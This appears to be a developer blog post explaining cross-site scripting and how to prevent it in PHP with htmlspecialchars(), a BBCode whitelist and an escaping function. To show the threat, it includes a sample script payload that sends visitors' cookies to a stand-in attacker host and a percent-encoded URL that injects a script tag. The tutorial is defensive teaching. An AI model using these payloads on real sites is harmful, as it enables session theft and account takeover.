
Cross-site scripting (XSS) and how to prevent it


XSS stands for cross-site scripting. Unlike most attacks, this exploit works on the client side: the malicious code runs in the victim's browser, not on your server. The most basic form of XSS is to put some JavaScript in user-submitted content to steal the data in a user's cookie. Since most sites use cookies and sessions to identify visitors, the stolen data can then be used to impersonate that user, which is deeply troublesome when it's a typical user account and downright disastrous if it's the administrative account. Even if you don't use cookies or session IDs on your site, your users are not safe: an injected script can still rewrite the page, redirect visitors, or capture what they type. So you should still be aware of how this attack works.
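To see why unfiltered content is dangerous, here is a minimal sketch. The function names, the payload, and the attacker.example URL are hypothetical. Echoing a comment verbatim ships the script to every visitor. Escaping it with PHP's htmlspecialchars() turns the same script into inert text.

```php
<?php
// Hypothetical payload: tries to send the visitor's cookies to an attacker's server
$comment = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>";

// Hypothetical renderer, vulnerable: user content is pasted into the page unchanged
function render_comment_unsafe(string $comment): string {
    return '<p>' . $comment . '</p>';
}

// Hypothetical renderer, safer: special characters become entities,
// so the browser displays the script as text instead of running it
function render_comment_safe(string $comment): string {
    return '<p>' . htmlspecialchars($comment, ENT_QUOTES, 'UTF-8') . '</p>';
}

echo render_comment_unsafe($comment), "\n";
echo render_comment_safe($comment), "\n";
```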

XSS attacks are harder to prevent than SQL injection attacks. Yahoo, eBay and Microsoft have all been affected by XSS. Although the attack doesn't run in PHP, you can use PHP to filter user data in order to prevent attacks. To stop an XSS attack, you have to restrict and filter the data a user submits to your site, and escape it before you display it. It is for this precise reason that most online bulletin boards don't allow HTML tags in posts and instead replace them with custom tag formats such as [b] and [links].
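The bulletin-board approach can be sketched as "escape everything, then re-enable a small whitelist." The helper below is hypothetical and supports only [b]...[/b]. Because the tag conversion runs after htmlspecialchars(), nothing the user types can produce any markup except the <strong> tags the helper inserts itself.

```php
<?php
// Hypothetical helper: escape all user input, then turn [b]...[/b] into <strong>...</strong>
function bbcode_bold(string $input): string {
    // 1. Neutralise any real HTML the user typed
    $safe = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

    // 2. Re-enable only the whitelisted tag; (.*?) is non-greedy, so it matches
    //    the shortest run between [b] and [/b], and the s modifier lets it span newlines
    return preg_replace('/\[b\](.*?)\[\/b\]/s', '<strong>$1</strong>', $safe);
}

echo bbcode_bold('[b]Hello[/b] <script>alert(1)</script>'), "\n";
// prints <strong>Hello</strong> &lt;script&gt;alert(1)&lt;/script&gt;
```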

Let’s look at a simple script that illustrates how to prevent some of these attacks. For a more complete solution, use SAFEHTML, discussed later in this post.

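// Helps prevent XSS attacks
function transform_HTML($string, $length = null) {

		// Remove dead space
		$string = trim($string);

		// Optionally cap the length before encoding, counting UTF-8
		// characters (needs the mbstring extension), so the cut can never
		// split a multibyte character or leave half an entity behind
		$length = (int) $length;
		if ($length > 0) {
			$string = mb_substr($string, 0, $length, 'UTF-8');
		}

		// HTMLize HTML-specific characters: &, <, > and double quotes.
		// Input is treated as UTF-8; ENT_SUBSTITUTE swaps invalid byte
		// sequences for U+FFFD instead of returning an empty string.
		$string = htmlentities($string, ENT_COMPAT | ENT_SUBSTITUTE, 'UTF-8');

		// Also encode single quotes, # and % in one pass, so no entity
		// inserted here is ever rewritten a second time
		$string = strtr($string, array(
			"'" => "&#39;",
			"#" => "&#35;",
			"%" => "&#37;",
		));

		return $string;

}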

This function transforms HTML-specific characters into HTML entities. A browser renders any HTML run through this function as plain text with no markup. For example, let's consider this HTML string:

<strong>Bold Text</strong>

Normally, this HTML would render as follows:

Bold Text

However, when run through transform_HTML(), it renders exactly as it was typed, tags and all, because the tag characters in the processed string are now HTML entities. Viewed as plain text, the string returned by transform_HTML() looks like this:

&lt;strong&gt;Bold Text&lt;/strong&gt;
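You can confirm this transformation with htmlentities() alone, since that is the step that does the work. The flags used here (ENT_QUOTES, UTF-8) are an assumption for the sketch, not necessarily the exact arguments inside transform_HTML().

```php
<?php
$input = '<strong>Bold Text</strong>';

// Convert <, > and & (and, with ENT_QUOTES, both quote types) into entities
$encoded = htmlentities($input, ENT_QUOTES, 'UTF-8');

echo $encoded, "\n"; // prints &lt;strong&gt;Bold Text&lt;/strong&gt;

// Decoding gives back the original markup, so nothing the user typed is lost
echo html_entity_decode($encoded, ENT_QUOTES, 'UTF-8') === $input ? "round-trip ok\n" : "mismatch\n";
```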

The essential piece of this function is the htmlentities() call, which transforms <, > and & into their entity equivalents &lt;, &gt; and &amp;. Although this takes care of the most common attacks, experienced XSS attackers have another sneaky trick up their sleeve: encoding their malicious scripts in hexadecimal (URL percent-encoding) or UTF-8 instead of plain ASCII text, hoping to slip past your filters. They can send the code along as a GET variable in the URL, saying, "Hey, this is hexadecimal code, but could you run it for me anyway?" A hexadecimal example looks something like this:

<a href="https://alltopdevs/a.php?variable=%22%3e%3c%53%43%52%49%50%54%3e%44%6f%73%6f%6d%65%74%68%69%6e%67%6d%61%6c%69%63%69%6f%75%73%3c%2f%53%43%52%49%50%54%3e">

But once the query string is decoded (PHP does this automatically when it fills $_GET) and a page echoes the variable back without filtering, the browser receives:

<a href="https://alltopdevs/a.php?variable="><SCRIPT>Dosomethingmalicious</SCRIPT>
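The hex digits are ordinary URL percent-encoding. The sketch below reproduces the decoding with urldecode() on a payload like the one above (no request is made; the string is hard-coded). It shows that escaping the decoded value still neutralises the script, because your filter sees the value only after decoding.

```php
<?php
// Percent-encoded value of ?variable=..., as it would appear in the URL
$raw = '%22%3e%3c%53%43%52%49%50%54%3e%44%6f%73%6f%6d%65%74%68%69%6e%67'
     . '%6d%61%6c%69%63%69%6f%75%73%3c%2f%53%43%52%49%50%54%3e';

// PHP applies this kind of decoding itself when it builds $_GET
$decoded = urldecode($raw);
echo $decoded, "\n"; // prints: "><SCRIPT>Dosomethingmalicious</SCRIPT>

// Escaping the decoded value turns every tag character into an entity
echo htmlentities($decoded, ENT_QUOTES, 'UTF-8'), "\n";
```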

To prevent this, transform_HTML() takes the additional steps of converting # and % signs into their entities, as an extra layer of defense against hex-encoded payloads, and of handling the character encoding of the input.
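The # and % step can be sketched on its own. The helper name below is hypothetical. It uses strtr() with an array, which scans the string once and never re-examines text it has already replaced. Two chained str_replace() calls would have to run in the right order: replacing % first and # second turns &#37; into &&#35;37;.

```php
<?php
// Hypothetical helper: encode # and % as numeric character references
function encode_hash_percent(string $s): string {
    // strtr() with an array does a single pass, so the '#' inside a
    // freshly inserted "&#37;" is never replaced again
    return strtr($s, array('#' => '&#35;', '%' => '&#37;'));
}

echo encode_hash_percent('100% of #tags'), "\n"; // prints 100&#37; of &#35;tags
```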

Finally, in case someone tries to overload a string with a very long input, hoping to crash something, the optional $length parameter trims the string to the maximum length you specify.
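Where and how you cut the string matters. A minimal sketch, assuming the mbstring extension is available: substr() counts bytes and can split a UTF-8 character in half, while mb_substr() counts characters. Cutting after encoding has a similar hazard, because the cut can land inside an entity.

```php
<?php
$input = "h\u{e9}llo"; // "héllo"; é is two bytes (C3 A9) in UTF-8

$bytes = substr($input, 0, 2);             // "h" plus half of "é": invalid UTF-8
$chars = mb_substr($input, 0, 2, 'UTF-8'); // "hé"

var_dump(mb_check_encoding($bytes, 'UTF-8')); // bool(false)
var_dump(mb_check_encoding($chars, 'UTF-8')); // bool(true)

// Truncating an already-encoded string can leave a broken entity behind
echo substr(htmlentities('a<b', ENT_QUOTES, 'UTF-8'), 0, 3), "\n"; // prints a&l
```

This is why a character-aware cut made before encoding is the safer order.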

Design | UX | Software Consultant